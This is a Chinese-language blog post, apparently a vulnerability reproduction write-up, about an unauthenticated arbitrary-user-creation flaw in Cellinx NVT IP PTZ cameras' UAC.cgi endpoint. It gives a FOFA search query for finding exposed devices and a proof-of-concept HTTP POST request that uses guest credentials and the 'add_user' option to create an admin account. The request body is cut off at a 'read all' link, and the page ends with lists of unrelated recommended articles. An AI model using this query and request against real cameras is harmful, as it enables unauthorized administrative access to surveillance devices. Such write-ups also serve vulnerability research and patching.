Cellinx NVT 摄像机 UAC.cgi 任意用户创建漏洞复现

  • 开发
  • 51

0x01 产品简介

Cellinx NVT IP PTZ是韩国Cellinx公司的一个摄像机设备。

0x02 漏洞概述

Cellinx NVT 摄像机 UAC.cgi接口处存在任意用户创建漏洞,未经身份认证的攻击者可利用此接口创建管理员账户,登录后台可查看敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="local/NVT-string.js"

0x04 漏洞复现

PoC

POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"jsonData":{"username":"guest","password":"","option":"add_user","data":{"username":"test123","password":"test123
阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-17 12:26:06       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-17 12:26:06       106 阅读

  9. 在Django里面运行非项目文件

    2024-01-17 12:26:06       87 阅读

  19. Python语言-面向对象

    2024-01-17 12:26:06       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-01-17 12:26:06       91 阅读

热门阅读

  2. 开箱即用之MyBatisPlus XML 自定义分页

    2024-01-17 12:26:06       55 阅读

  5. 记一次Log记录大对象导致的CPU异常和磁盘打满

    2024-01-17 12:26:06       56 阅读

  10. PHP 字符串面试题

    2024-01-17 12:26:06       64 阅读

  12. 什么是池化层?

    2024-01-17 12:26:06       55 阅读

  13. 2024华数杯国际数学建模A题思路模型详解

    2024-01-17 12:26:06       44 阅读

  14. Oracle数据库避坑:CASE WHEN ‘ ‘ = ‘ ‘ 空字符串比较,预期的结果与判断逻辑的实现之间存在不匹配

    2024-01-17 12:26:06       49 阅读

  15. 设计模式——原型模式

    2024-01-17 12:26:06       50 阅读

  18. 正则表达式 (用于灵活匹配文本的表达式)

    2024-01-17 12:26:06       54 阅读

  19. 自定义shell工具函数之pull_image()

    2024-01-17 12:26:06       51 阅读

  25. Spring 整合Shiro鉴权授权

    2024-01-17 12:26:06       48 阅读

  26. 【Flask】使用 werkzeug 安全地处理密码

    2024-01-17 12:26:06       56 阅读